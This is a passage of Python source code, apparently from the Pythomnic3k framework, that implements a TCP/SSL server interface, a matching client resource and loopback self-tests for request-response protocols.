# field from ssl peer's certificate
def _peer_cn(s):
cert = s.getpeercert()
if cert:
for field in cert["subject"]:
if field[0][0] == "commonName":
return field[0][1]
return None
###############################################################################
class TcpConnection:
"""
<TcpConnection>
An instance of this class is created for each TCP connection accepted by
the interface's listener thread. The I/O thread invokes that instance's
methods in response to network events such as data available on the socket.
The actual protocol specific processing is done by a new instance of handler
for each new request, created and owned by this instance. The TCP connection
is kept alive while handler allows.
"""
@typecheck
def __init__(self, interface_name: str, socket, handler_factory: callable,
request_timeout: float):
self._interface_name = interface_name
self._socket, self._cf = socket, _cf(socket)
self._peer_ip = socket.getpeername()[0]
self._handler_factory = handler_factory
self._handler = None
self._request_timeout = request_timeout
self._go_active()
self._state = self._state_initialize
self._unwritten_data = None
socket = property(lambda self: self._socket)
expired = property(lambda self: self._timeout.expired)
request = property(lambda self: self._request)
idle = property(lambda self: self._idle)
###################################
def _go_idle(self, idle_timeout: float):
self._idle = True
self._timeout = Timeout(idle_timeout)
self._request = None
def _go_active(self):
self._idle = False
self._timeout = Timeout(self._request_timeout)
self._handler = self._handler_factory(self._handler)
self._request = None
###################################
"""
Each time the handler finishes parsing a network protocol request, a new
Pythomnic request is created and started. Similarly, whenever this connection
instance is discarded, either upon success or failure, the request is ended.
"""
def _request_parameters(self): # these are made separate methods to allow
return dict(auth_tokens = dict(peer_ip = self._peer_ip, # overriding them in SslConnection class
encrypted = False))
def _describe_request(self):
self._request.describe("TCP connection from {0:s}".format(self._peer_ip))
def _begin_request(self):
self._request = pmnc.interfaces.begin_request(
timeout = self._timeout.remain, interface = self._interface_name,
protocol = self._handler.protocol, parameters = self._request_parameters())
self._describe_request()
def _end_request(self, reason = None):
if self._request:
request, self._request = self._request, None
pmnc.interfaces.end_request(reason is None, request)
###################################
def _state_initialize(self): # this fake state performs the initial
self._state = self._state_read # dispatch of the connection just accepted
return "read"
###################################
def _recv(self):
return self._socket.recv(16384), "read"
def _state_read(self):
data, wait_state = self._recv()
if data: # some data received from the client
if self._idle:
self._go_active()
if self._handler.consume(data):
self._begin_request()
self._state = self._state_resume
return "enqueue"
else: # otherwise, keep reading
return wait_state
elif self._idle: # it's ok for the client to disconnect
self._state = None # between requests
return "close"
else:
raise Exception("unexpected eof")
###################################
"""
The actual processing of the parsed request is performed by the same handler
that parsed it (nobody else would know how to handle it). The process_tcp_request
method is invoked by one of the main thread pool threads from wu_process_tcp_request
in I/O thread.
"""
def process_tcp_request(self):
self._handler.process_tcp_request()
###################################
def _state_resume(self): # this fake state performs the dispatch
self._state = self._state_write # of the connection with ready response
return "write"
###################################
def _send(self, data):
return self._socket.send(data)
def _state_write(self):
data = self._unwritten_data or \
self._handler.produce(16384) # the handler gives out a response
if data: # some data still needs to be sent
try:
sent = self._send(data)
except:
self._unwritten_data = data # this allows the send attempt to be retried
raise # if appropriate (see SslConnection class)
else:
self._unwritten_data = None
if sent > 0:
unsent = len(data) - sent
if unsent > 0:
self._handler.retract(unsent)
return "write"
else:
raise Exception("unexpected eof")
else:
self._end_request()
idle_timeout = self._handler.idle_timeout
if idle_timeout > 0.0: # if the connection is kept alive
self._go_idle(idle_timeout) # return to reading another request
self._state = self._state_read
return "read"
else: # gracefully close the connection
self._state = None
return "close"
###################################
def process(self): # this is a state switch
return self._state()
###################################
def close(self, reason): # this is called from I/O thread's
self._end_request(reason) # discard_socket procedure
try:
self._socket.close()
except:
if pmnc.log.debug:
pmnc.log.debug(exc_string()) # log and ignore
###############################################################################
def _wrap_socket(s, *, ssl_ciphers, ssl_protocol, ssl_server_hostname, ssl_ignore_hostname, **kwargs):
ssl_protocol = ssl_protocol or "TLSv1"
try:
ssl_version = getattr(ssl, "PROTOCOL_{0:s}".format(ssl_protocol))
except AttributeError:
raise Exception("the requested SSL/TLS protocol {0:s} "
"is not supported".format(ssl_protocol))
ssl_context = SSLContext(ssl_version)
if ssl_version == PROTOCOL_SSLv23:
ssl_context.options |= OP_NO_SSLv2
ssl_context.options |= OP_NO_SSLv3
if ssl_ciphers is not None:
ssl_context.set_ciphers(ssl_ciphers)
keyfile = kwargs.pop("keyfile", None)
certfile = kwargs.pop("certfile", None)
assert keyfile == certfile
if certfile:
ssl_context.load_cert_chain(certfile)
ca_certs = kwargs.pop("ca_certs")
ssl_context.load_verify_locations(ca_certs)
ssl_context.verify_mode = kwargs.pop("cert_reqs")
ssl_context.check_hostname = ssl_server_hostname is not None and not ssl_ignore_hostname
return ssl_context.wrap_socket(s,
do_handshake_on_connect = False,
server_hostname = ssl_server_hostname,
**kwargs)
###############################################################################
class SslConnection(TcpConnection):
"""
<SslConnection>
This class is a functionally equivalent descendant of TcpConnection.
It has a handful of methods overriden to support SSL transport.
"""
@typecheck
def __init__(self,
interface_name: str,
socket,
handler_factory: callable,
request_timeout: float,
ssl_key_cert_file: os_path.isfile,
ssl_ca_cert_file: os_path.isfile,
ssl_ciphers: optional(str),
ssl_protocol: optional(one_of("SSLv23", "TLSv1", "TLSv1_1", "TLSv1_2", "TLS")),
required_auth_level: one_of(CERT_REQUIRED, CERT_OPTIONAL, CERT_NONE)):
TcpConnection.__init__(self, interface_name, socket, handler_factory, request_timeout)
self._tcp_socket = self._socket
self._socket = _wrap_socket(self._tcp_socket, server_side = True, keyfile = ssl_key_cert_file,
certfile = ssl_key_cert_file, ca_certs = ssl_ca_cert_file,
ssl_ciphers = ssl_ciphers, ssl_protocol = ssl_protocol,
ssl_server_hostname = None, ssl_ignore_hostname = True,
cert_reqs = required_auth_level)
self._socket.setblocking(False)
def _state_initialize(self): # this fake state performs the initial
self._state = self._state_handshake # dispatch of the connection just accepted
return "read"
def _state_handshake(self):
self._socket.do_handshake()
self._peer_cn = _peer_cn(self._socket) # this can be None if peer provided no certificate
if pmnc.log.debug:
cipher = self._socket.cipher()
if self._peer_cn:
pmnc.log.debug("{0:s} is encrypted ({1:s}) and authenticated ({2:s})".\
format(self._cf, cipher[0], self._peer_cn))
else:
pmnc.log.debug("{0:s} is encrypted ({1:s})".format(self._cf, cipher[0]))
self._state = self._state_read
return "read"
def _request_parameters(self):
request_parameters = TcpConnection._request_parameters(self)
auth_tokens = request_parameters["auth_tokens"]
auth_tokens.update(encrypted = True)
if self._peer_cn is not None:
auth_tokens.update(peer_cn = self._peer_cn)
return request_parameters
def _describe_request(self):
self._request.describe("SSL connection from {0:s}".format(self._peer_ip))
# receiving SSL data in non-blocking mode is ugly; for one, more data could
# have been received and buffered by the SSL socket than we may want to read,
# hence we have to keep reading while it is possible; for two, even though
# we are only reading, key renegotiation may occur which needs to write, hence
# WANT_WRITE case is possible; for three, we may encounter EOF while reading,
# and there is no way we can signal it to the caller without possibly losing
# the data already read; finally, we may not be reading infinitely but we have
# to protect ourselves against flooding by setting an arbitrary upper bound
_max_read_data = 1048576
def _recv(self):
data, data_len = [], 0
while data_len <= self._max_read_data: # prevent flooding, because the data read here is
try: # not seen by the handler in the course of reading
portion = self._socket.read(16384)
if portion:
data.append(portion)
data_len += len(portion)
else: # EOF from the client
wait_state = "read"
break
except SSLError as e:
if data: # if no data has been read, the exception is rethrown
if e.args[0] == SSL_ERROR_WANT_READ:
wait_state = "read"
break
elif e.args[0] == SSL_ERROR_WANT_WRITE:
wait_state = "write"
break
raise
else:
raise Exception("input size exceeded")
return b"".join(data), wait_state
def _send(self, data):
return self._socket.write(data)
def process(self): # this is a state switch
try:
return self._state()
except SSLError as e: # connection state remains the same,
if e.args[0] == SSL_ERROR_WANT_READ: # but the I/O wait state switches
return "read"
elif e.args[0] == SSL_ERROR_WANT_WRITE:
return "write"
else:
raise
###############################################################################
class TcpInterface: # called such so as not to be confused with "real" Interface's
"""
<TcpInterface>
This is a generic facility for implementing request-response protocols
over TCP or SSL. An instance of this class owns two threads - listener
thread and I/O thread. Listener thread accepts incoming TCP connections
and hands them over to the I/O thread. I/O thread performs all the network
processing in asynchronous mode (via select). The actual protocol details
are processed by the handlers created by the supplied handler_factory.
"""
@typecheck
def __init__(self,
name: str, # the name of the "real" interface
handler_factory: callable,
request_timeout: float,
*,
listener_address: (str, int),
max_connections: int,
ssl_key_cert_file: optional(os_path.isfile),
ssl_ca_cert_file: optional(os_path.isfile),
ssl_ciphers: optional(str),
ssl_protocol: optional(one_of("SSLv23", "TLSv1", "TLSv1_1", "TLSv1_2", "TLS")),
required_auth_level: optional(one_of(CERT_REQUIRED, CERT_OPTIONAL, CERT_NONE)) = CERT_OPTIONAL): # this parameter is only user in protocol_rpc.py
self._name = name
self._handler_factory = handler_factory
self._listener_address = listener_address
self._max_connections = max_connections
assert (ssl_key_cert_file is None and ssl_ca_cert_file is None) or \
(os_path.isfile(ssl_key_cert_file) and os_path.isfile(ssl_ca_cert_file)), \
"both certificate files must be specified or none of them"
self._ssl_key_cert_file = ssl_key_cert_file
self._ssl_ca_cert_file = ssl_ca_cert_file
self._ssl_ciphers = ssl_ciphers
self._ssl_protocol = ssl_protocol
self._use_ssl = ssl_key_cert_file is not None and ssl_ca_cert_file is not None
# create two sides of a UDP socket used for kicking
# I/O thread from blocking select
self._pulse_recv = socket(AF_INET, SOCK_DGRAM)
self._pulse_recv.bind(("127.0.0.1", 0))
self._pulse_recv_address = self._pulse_recv.getsockname()
self._pulse_send_lock = Lock()
self._pulse_send = socket(AF_INET, SOCK_DGRAM)
self._pulse_send.bind((self._pulse_recv_address[0], 0))
# create a queue used for delivering sockets to I/O thread
self._socket_queue = InterlockedQueue()
# select the appropriate class for connections
if self._use_ssl:
self._connection_factory = \
lambda socket: SslConnection(self._name, socket, self._handler_factory, request_timeout,
self._ssl_key_cert_file, self._ssl_ca_cert_file,
self._ssl_ciphers, self._ssl_protocol, required_auth_level)
else:
self._connection_factory = \
lambda socket: TcpConnection(self._name, socket, self._handler_factory, request_timeout)
# this Event when set prevents the I/O thread
# from enqueueing more requests
self._ceased = Event()
name = property(lambda self: self._name)
listener_address = property(lambda self: self._listener_address)
encrypted = property(lambda self: self._use_ssl)
###################################
def start(self):
# create and start the I/O thread
self._io = HeavyThread(target = self._io_proc,
name = "{0:s}:i/o".format(self._name))
self._io.start()
try: # create and start the listener thread
started_listening = Event()
self._listener = HeavyThread(target = self._listener_proc,
name = "{0:s}:lsn".format(self._name),
args = (started_listening, ))
self._listener.start()
# wait for the listener thread to actually start listening
try:
started_listening.wait(3.0) # this may spend waiting slightly less, but it's ok
if not started_listening.is_set():
raise Exception("failed to start listening")
except:
self.cease()
raise
except:
self.stop()
raise
###################################
def cease(self):
self._ceased.set() # this prevents the I/O thread from introducing new requests
self._listener.stop() # (from keep-alives) and the listener thread is simply stopped
###################################
def stop(self):
self._io.stop()
###################################
def _push_socket_wake_io(self, socket, mode):
self._socket_queue.push((socket, mode))
# kick the I/O thread from its blocking select to hasten this socket processing
with self._pulse_send_lock:
self._pulse_send.sendto(b"\x00", 0, self._pulse_recv_address)
###################################
# this method is a work unit executed by one of the interface pool threads,
# it does the actual processing and resubmits the socket back to the I/O thread
# for sending the response back to the client
def wu_process_tcp_request(self, socket, connection):
try:
# see for how long the request was on the execution queue up to this moment
# and whether it has expired in the meantime, if it did there is no reason
# to proceed and we simply bail out
if pmnc.request.expired:
pmnc.log.error("request has expired and will not be processed")
reuse_mode = "timeout"
return # still goes through the finally section below
with pmnc.performance.request_processing():
connection.process_tcp_request()
except:
pmnc.log.error(exc_string())
reuse_mode = "error"
else:
reuse_mode = "reuse"
finally:
self._push_socket_wake_io(socket, reuse_mode)
###################################
# this single thread multiplexes all the I/O on the interface
def _io_proc(self):
# all the currently active connections are here, arranged in select-ready lists,
# alongside with the mapping of sockets to the protocol-specific connections
r_sockets, w_sockets, connections = [self._pulse_recv], [], {}
# this function unconditionally removes all traces of a socket,
# it is the last resort and presumably should not throw
def discard_socket(socket, reason = None):
try:
w_sockets.remove(socket) # the socket may be in
except ValueError: # |
try: # V
r_sockets.remove(socket) # at most one list
except ValueError:
pass
connection = connections.pop(socket, None)
if reason:
if connection and connection.idle:
if pmnc.log.debug:
pmnc.log.debug("gracefully closing {0:s}: {1:s}".format(_cf(socket), reason))
else:
if pmnc.log.debug:
pmnc.log.debug("discarding {0:s}: {1:s}".format(_cf(socket), reason))
else:
if pmnc.log.debug:
pmnc.log.debug("gracefully closing {0:s}".format(_cf(socket)))
if connection:
try:
connection.close(reason)
except:
if pmnc.log.debug:
pmnc.log.debug(exc_string()) # log and ignore
try:
socket.close()
except:
if pmnc.log.debug:
pmnc.log.debug(exc_string()) # log and ignore
# this function is called periodically and forcefully discards the sockets
# whose connections have expired, having this 3 seconds slack also helps in
# gracefully delivering the "deadline expired" kind of responses although
# this is random and there is no guarantee such responses will be delivered
discard_timeout = Timeout(pmnc.request.self_test != "protocol_tcp" and 3.0 or 1.0)
def discard_expired_sockets():
if discard_timeout.expired:
try:
for socket, connection in list(connections.items()): # need to create a copy of connections
if connection.expired:
discard_socket(socket, "connection expired")
finally:
discard_timeout.reset()
# this function is called once at shutdown to terminate all idle
# persistent connections to prevent them from introducing more requests
idle_sockets_discarded = False
def discard_idle_sockets():
nonlocal idle_sockets_discarded
try:
for socket, connection in list(connections.items()): # need to create a copy of connections
if connection.idle:
discard_socket(socket, "interface shutdown")
finally:
idle_sockets_discarded = True
# this function selects sockets that can be read or written,
# also dealing with possible select failures
def select_rw_sockets(timeout):
while not timeout.expired:
try:
return select(r_sockets, w_sockets, [], timeout.remain)[0:2]
except (select_error, ValueError):
rs = []
for r_socket in r_sockets[:]: # need to create a copy of r_sockets
try:
if select([r_socket], [], [], 0.0)[0]:
rs.append(r_socket)
except (select_error, ValueError):
discard_socket(r_socket, "select failure")
continue # for
ws = []
for w_socket in w_sockets[:]: # need to create a copy of w_sockets
try:
if select([], [w_socket], [], 0.0)[1]:
ws.append(w_socket)
except (select_error, ValueError):
discard_socket(w_socket, "select failure")
continue # for
if rs or ws:
return rs, ws
else:
return [], []
# this function passes control to the given socket's connection,
# then dispatches it to the appropriate wait list
def process_socket(socket, sockets = None):
try:
connection = connections.get(socket)
if not connection: # must have already been discarded
return
wait_state = connection.process()
if wait_state == "read":
if sockets is w_sockets:
w_sockets.remove(socket)
if sockets is not r_sockets:
r_sockets.append(socket)
elif wait_state == "write":
if sockets is r_sockets:
r_sockets.remove(socket)
if sockets is not w_sockets:
w_sockets.append(socket)
elif wait_state == "enqueue":
if sockets is not None:
sockets.remove(socket)
if self._ceased.is_set():
discard_socket(socket, "interface shutdown")
else:
self._enqueue_request(connection.request,
self.wu_process_tcp_request,
(socket, connection), {})
elif wait_state == "close":
discard_socket(socket)
else:
assert False, "invalid wait state"
except:
discard_socket(socket, exc_string())
# this function creates a connection for a newly accepted
# socket and puts it to the appropriate wait list
def create_connection(socket):
if len(connections) < self._max_connections:
try:
connection = self._connection_factory(socket)
socket = connection.socket # this may be not the original TCP socket
connections[socket] = connection
process_socket(socket) # this does the appropriate initial dispatch
except:
discard_socket(socket, exc_string())
else:
discard_socket(socket, "too many connections")
# this function puts the socket for the processed
# request to the appropriate wait list
def reuse_connection(socket):
try:
process_socket(socket) # this does the appropriate dispatch upon resume
except:
discard_socket(socket, exc_string())
# this function reads and discards all UDP packets
# received and buffered on the pulse socket
def drain_pulse_socket():
while select([self._pulse_recv], [], [], 0.0)[0]:
try:
assert self._pulse_recv.recv(1) == b"\x00"
except:
pmnc.log.error(exc_string()) # log and ignore
# this thread multiplexes all the I/O on all the client sockets
while not current_thread().stopped(): # lifetime loop
try:
discard_expired_sockets()
if self._ceased.is_set() and not idle_sockets_discarded:
discard_idle_sockets()
# select the sockets which are ready for I/O and process them
readable_sockets, writable_sockets = select_rw_sockets(Timeout(1.0))
for r_socket in readable_sockets:
if r_socket is self._pulse_recv: # special case
drain_pulse_socket()
else:
process_socket(r_socket, r_sockets)
for w_socket in writable_sockets:
process_socket(w_socket, w_sockets)
# check for new incoming sockets from the queue
u_socket, mode = self._socket_queue.pop(0.0) or (None, None)
while u_socket:
try:
if mode == "create":
create_connection(u_socket)
elif mode == "reuse":
reuse_connection(u_socket)
else:
discard_socket(u_socket, mode)
except:
discard_socket(u_socket, exc_string())
u_socket, mode = self._socket_queue.pop(0.0) or (None, None)
except:
pmnc.log.error(exc_string()) # log and ignore
# discard the remaining sockets
for socket, connection in list(connections.items()): # need to create a copy of connections
discard_socket(socket, "interface shutdown")
###################################
# by default requests are enqueued to the main thread pool,
# but this method can be overridden to use a different pool,
# this is is done by RPC interface for example
def _enqueue_request(self, *args, **kwargs):
pmnc.interfaces.enqueue(*args, **kwargs)
###################################
def _create_random_server_socket(self) -> socket:
# negative port specifies random port range, for example -12000 means 12000-12999
server_address, base_random_port = self._listener_address
low_port = -base_random_port
for scale in (10000, 1000, 100, 10, 1):
if low_port % scale == 0:
high_port = low_port + scale
break
ports = list(range(low_port, high_port))
shuffle(ports)
for port in ports:
server_socket = socket(AF_INET, SOCK_STREAM)
try:
server_socket.bind((server_address, port)) # note the absence of SO_REUSEADDR
except socket_error:
server_socket.close()
else:
return server_socket
else:
raise Exception("ran out of possible bind ports")
###################################
def _create_static_server_socket(self) -> socket:
server_socket = socket(AF_INET, SOCK_STREAM)
try:
server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server_socket.bind(self._listener_address)
except:
server_socket.close()
raise
else:
return server_socket
###################################
def _listener_proc(self, started_listening):
# bind the socket and start listening
try:
server_port = self._listener_address[1]
if server_port >= 0:
server_socket = self._create_static_server_socket()
else:
server_socket = self._create_random_server_socket()
self._listener_address = server_socket.getsockname()
server_socket.listen(256)
except:
pmnc.log.error(exc_string())
return
try:
started_listening.set()
pmnc.log.message("started listening for connections at {0[0]:s}:{0[1]:d}".\
format(self._listener_address))
# this thread keeps accepting incoming connections and
# pushing the new sockets to the i/o thread's queue
while not current_thread().stopped(): # lifetime loop
try:
if select([server_socket], [], [], 1.0)[0]:
client_socket, client_address = server_socket.accept()
if pmnc.log.debug:
pmnc.log.debug("incoming connection from {0[0]:s}:{0[1]:d}".\
format(client_address))
client_socket.setblocking(False)
self._push_socket_wake_io(client_socket, "create")
except:
pmnc.log.error(exc_string()) # log and ignore
finally:
server_socket.close()
pmnc.log.message("stopped listening")
###############################################################################
class TcpResource: # called such so as not to be confused with "real" Resource's
"""
<TcpResource>
This is a generic facility for implementing client protocol sides
over TCP or SSL. In the course of sending or receiving data this class
respects the request timeout and is not blocking.
"""
@typecheck
def __init__(self,
name: str,
*,
server_address: (str, int),
connect_timeout: float,
ssl_key_cert_file: optional(os_path.isfile),
ssl_ca_cert_file: optional(os_path.isfile),
ssl_ciphers: optional(str),
ssl_protocol: optional(one_of("SSLv23", "TLSv1", "TLSv1_1", "TLSv1_2", "TLS")),
ssl_server_hostname: optional(str),
ssl_ignore_hostname: optional(bool)):
self._name = name
self._server_address = server_address
self._connect_timeout = connect_timeout
assert ssl_key_cert_file is None or os_path.isfile(ssl_ca_cert_file), \
"CA certificate file must be specified"
self._ssl_key_cert_file = ssl_key_cert_file
self._ssl_ca_cert_file = ssl_ca_cert_file
self._ssl_ciphers = ssl_ciphers
self._ssl_protocol = ssl_protocol
self._ssl_server_hostname = ssl_server_hostname
self._ssl_ignore_hostname = ssl_ignore_hostname
self._use_ssl = ssl_ca_cert_file is not None
self._peer_cn = None
self._server_info = "{0:s} {1:s}://{2[0]:s}:{2[1]:d}".\
format(self._name, self._use_ssl and "ssl" or "tcp",
self._server_address)
name = property(lambda self: self._name)
encrypted = property(lambda self: self._use_ssl)
peer_cn = property(lambda self: self._peer_cn)
server_info = property(lambda self: self._server_info)
###################################
# TCP-specific send/recv
def _tcp_send(self, data):
if not select([], [self._socket], [], pmnc.request.remain)[1]:
raise Exception("request deadline writing data to {0:s}".format(self._server_info))
return self._socket.send(data)
def _tcp_recv(self, n):
if not select([self._socket], [], [], pmnc.request.remain)[0]:
raise Exception("request deadline reading data from {0:s}".format(self._server_info))
return self._socket.recv(n)
###################################
# SSL-specific send/recv
def _ssl_retry(self, label, timeout, f):
while not timeout.expired:
try:
return f()
except SSLError as e:
if e.args[0] == SSL_ERROR_WANT_READ:
select([self._socket], [], [], timeout.remain)
elif e.args[0] == SSL_ERROR_WANT_WRITE:
select([], [self._socket], [], timeout.remain)
else:
raise
else:
raise Exception("request deadline {0:s} {1:s}".\
format(label, self._server_info))
def _ssl_send(self, data):
return self._ssl_retry("writing data to", pmnc.request,
lambda: self._socket.write(data))
def _ssl_recv(self, n):
return self._ssl_retry("reading data from", pmnc.request,
lambda: self._socket.read(n))
###################################
def connect(self):
if self._ssl_server_hostname is not None:
ssl_server_hostname = self._ssl_server_hostname
sni_suffix = "/sni={0:s}".format(ssl_server_hostname)
else:
ssl_server_hostname = self._server_address[0]
sni_suffix = ""
if pmnc.log.debug:
pmnc.log.debug("connecting to {0:s}{1:s}".format(self._server_info, sni_suffix))
try:
self._socket = socket(AF_INET, SOCK_STREAM)
try:
# establish TCP connection within connect_timeout
# or request timeout whichever is smaller
timeout = Timeout(min(self._connect_timeout, pmnc.request.remain))
self._socket.settimeout(timeout.remain or 0.01)
self._socket.connect(self._server_address)
self._socket.setblocking(False)
if self._use_ssl: # perform SSL handshake
self._socket.getpeername() # fixme - remove, see http://bugs.python.org/issue4171
self._tcp_socket = self._socket
self._socket = _wrap_socket(self._tcp_socket,
server_side = False,
keyfile = self._ssl_key_cert_file,
certfile = self._ssl_key_cert_file,
ca_certs = self._ssl_ca_cert_file,
ssl_ciphers = self._ssl_ciphers,
ssl_protocol = self._ssl_protocol,
ssl_server_hostname = ssl_server_hostname,
ssl_ignore_hostname = self._ssl_ignore_hostname,
cert_reqs = CERT_REQUIRED)
self._socket.setblocking(False)
# perform asynchronous handshake within the rest of connect_timeout
self._ssl_retry("waiting for handshake with", timeout, self._socket.do_handshake)
# extract peer's certificate info, there has to be one, because we use CERT_REQUIRED
self._peer_cn = _peer_cn(self._socket)
self._server_info = "{0:s} ssl://{1[0]:s}:{1[1]:d}/cn={2:s}".\
format(self._name, self._server_address, self._peer_cn)
# select appropriate send/recv methods
self._send = self._ssl_send
self._recv = self._ssl_recv
else:
self._send = self._tcp_send
self._recv = self._tcp_recv
except:
self._socket.close()
raise
except:
pmnc.log.error("connection to {0:s}{1:s} failed: {2:s}".\
format(self._server_info, sni_suffix, exc_string()))
raise
else:
if pmnc.log.debug:
pmnc.log.debug("connected to {0:s}".format(self._server_info))
###################################
def send_request(self, request: bytes, response_handler: optional(callable) = None):
if request:
if pmnc.log.debug:
pmnc.log.debug("sending {0:d} byte(s) to {1:s}".\
format(len(request), self._server_info))
# send request, occasionally timing out
request = BytesIO(request)
data = request.read(16384)
while data:
sent = self._send(data)
if sent == 0:
raise Exception("unexpected eof writing data to {0:s}".\
format(self._server_info))
unsent = len(data) - sent
if unsent > 0:
request.seek(-unsent, SEEK_CUR)
data = request.read(16384)
if response_handler is None:
return None
if pmnc.log.debug:
pmnc.log.debug("waiting for response from {0:s}".format(self._server_info))
# receive response, occasionally timing out
response_length = 0
while True:
data = self._recv(16384)
response_length += len(data)
response = response_handler(data) # notify response handler before checking for eof,
if response is not None: # because eof may be legitimate at this time
break
if not data:
raise Exception("unexpected eof reading data from {0:s}".\
format(self._server_info))
if pmnc.log.debug:
pmnc.log.debug("received {0:d} byte(s) from {1:s}".\
format(response_length, self._server_info))
return response
###################################
def disconnect(self):
try:
if pmnc.log.debug:
pmnc.log.debug("disconnecting from {0:s}".format(self._server_info))
self._socket.close()
except:
pmnc.log.error(exc_string()) # log and ignore
###############################################################################
def self_test():
from time import time, sleep
from random import random, randint
from threading import Thread
from os import urandom
from pmnc.request import fake_request
request_timeout = pmnc.config_interfaces.get("request_timeout")
max_connections = pmnc.config_interfaces.get("thread_count") * 2
###################################
def test_interface(ssl_key_cert_file, ssl_ca_cert_file, ssl_ciphers, ssl_protocol):
###############################
def start_interface(handler_factory, **kwargs):
kwargs.setdefault("listener_address", ("127.0.0.1", 0))
kwargs.setdefault("max_connections", max_connections)
kwargs.setdefault("ssl_key_cert_file", ssl_key_cert_file)
kwargs.setdefault("ssl_ca_cert_file", ssl_ca_cert_file)
kwargs.setdefault("ssl_ciphers", ssl_ciphers)
kwargs.setdefault("ssl_protocol", ssl_protocol)
ifc = TcpInterface("test", handler_factory, request_timeout, **kwargs)
ifc.start()
return ifc
###############################
def connect_to(ifc): # blocking connect
s = socket(AF_INET, SOCK_STREAM)
s.connect(ifc.listener_address)
if ssl_key_cert_file:
s = _wrap_socket(s, ca_certs = ssl_ca_cert_file,
ssl_protocol = ssl_protocol,
ssl_ciphers = ssl_ciphers,
ssl_server_hostname = None,
ssl_ignore_hostname = True,
cert_reqs = CERT_REQUIRED)
try:
s.do_handshake()
except:
pmnc.log.error(exc_string())
return s
###############################
def drain_socket(socket, timeout):
t = Timeout(timeout)
if select([socket], [], [], t.remain)[0]:
result = b""
while True:
try:
result += socket.recv(1024)
except:
pmnc.log.error(exc_string())
break
else:
if t.expired or not select([socket], [], [], t.remain)[0]:
break
return result
else:
return None
###############################
def peer_drops_connection(socket, timeout):
t = Timeout(timeout)
while not t.expired:
if drain_socket(socket, 0.1) == b"":
return True
return False
###############################
class NullParser:
def __init__(self, prev_handler):
pass
###############################
class LineEchoParser:
protocol = "line_echo"
def __init__(self, prev_handler):
self._data = b""
def consume(self, data):
self._data += data
if self._data.endswith(b"\n"):
return True
def process_tcp_request(self):
self._response = BytesIO(self._data)
del self._data # as this is a one-request handler
def produce(self, n):
return self._response.read(n)
def retract(self, n):
self._response.seek(-n, SEEK_CUR)
idle_timeout = 5.0
###############################
pmnc.log.message("****************** START/STOP ******************")
def test_start_stop():
ifc = start_interface(NullParser)
try:
assert ifc.listener_address[0] == "127.0.0.1"
sleep(2.0) # to let the threads run
finally:
ifc.cease(); ifc.stop()
test_start_stop()
###############################
pmnc.log.message("****************** START/STOP RANDOM PORT ******************")
def test_start_stop_random_port():
ifc = start_interface(NullParser, listener_address = ("127.0.0.1", -54300))
try:
assert ifc.listener_address[0] == "127.0.0.1"
assert 54300 <= ifc.listener_address[1] < 54400
sleep(2.0) # to let the threads run
finally:
ifc.cease(); ifc.stop()
test_start_stop_random_port()
###############################
pmnc.log.message("****************** CONNECT/DISCONNECT ******************")
def test_connect_disconnect():
ifc = start_interface(NullParser)
try:
s = connect_to(ifc)
sleep(2.0)
s.close()
finally:
ifc.cease(); ifc.stop()
test_connect_disconnect()
###############################
pmnc.log.message("****************** CONNECTION LIMIT ******************")
def test_max_connections():
ifc = start_interface(NullParser)
try:
ss = []
for i in range(max_connections):
ss.append(connect_to(ifc))
sleep(0.1)
for s in ss:
assert not peer_drops_connection(s, 0.1)
s = connect_to(ifc)
assert peer_drops_connection(s, 1.0)
finally:
ifc.cease(); ifc.stop()
test_max_connections()
###############################
pmnc.log.message("****************** SIMPLE REQUEST/RESPONSE TEST ******************")
def test_process_request_response():
ifc = start_interface(LineEchoParser)
try:
s = connect_to(ifc)
r = s.makefile("rb")
for i in range(1, 19):
data = urandom(randint(2 ** (i - 1), 2 ** i)).\
replace(b"\n", b" ").replace(b"\r", b" ").replace(b"\x00", b" ") + b"\n"
s.sendall(data)
resp = r.readline()
assert resp == data
finally:
ifc.cease(); ifc.stop()
test_process_request_response()
###############################
pmnc.log.message("****************** LOOPBACK CONNECTION FAILURE TEST ******************")
def test_loopback_connection_failure():
ifc = start_interface(LineEchoParser)
try:
fake_request(10.0)
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ("1.2.3.4", 1234),
connect_timeout = 3.0,
ssl_key_cert_file = ifc._ssl_key_cert_file,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
try:
r.connect()
except:
pmnc.log.error(exc_string())
else:
assert False, "shouldn't be able to connect"
finally:
ifc.cease(); ifc.stop()
test_loopback_connection_failure()
###############################
def test_res(ifc, r):
assert r.encrypted == (ifc._ssl_key_cert_file is not None)
assert r.peer_cn is None
r.connect()
try:
assert r.encrypted == (ifc._ssl_key_cert_file is not None)
if r.encrypted:
assert r.peer_cn is not None
response = b""
def loopback_handler(b):
nonlocal response
response += b
if response.endswith(b"\n"):
return response
for i in range(1, 19):
data = urandom(randint(2 ** (i - 1), 2 ** i)).\
replace(b"\n", b" ").replace(b"\r", b" ").replace(b"\x00", b" ") + b"\n"
response = b""
assert r.send_request(data, loopback_handler) == data
finally:
r.disconnect()
###############################
pmnc.log.message("****************** LOOPBACK 1-WAY TEST ******************")
def test_loopback_1way():
ifc = start_interface(LineEchoParser)
try:
fake_request(10.0)
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ifc.listener_address,
connect_timeout = 3.0,
ssl_key_cert_file = None,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
test_res(ifc, r)
finally:
ifc.cease(); ifc.stop()
test_loopback_1way()
###############################
pmnc.log.message("****************** LOOPBACK 2-WAY TEST ******************")
def test_loopback_2way():
ifc = start_interface(LineEchoParser, required_auth_level = CERT_REQUIRED)
try:
fake_request(10.0)
if ifc.encrypted:
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ifc.listener_address,
connect_timeout = 3.0,
ssl_key_cert_file = None,
ssl_ca_cert_file = ifc._ssl_ca_cert_file,
ssl_ciphers = ifc._ssl_ciphers,
ssl_protocol = ifc._ssl_protocol,
ssl_server_hostname = None,
ssl_ignore_hostname = True)
try:
r.connect()
except Exception as e:
assert "HANDSHAKE_FAILURE" in str(e)
else:
assert False, "shouldn't be able to connect without a client certificate"
r = pmnc.protocol_tcp.TcpResource("tres", server_address = ifc.listener_address,
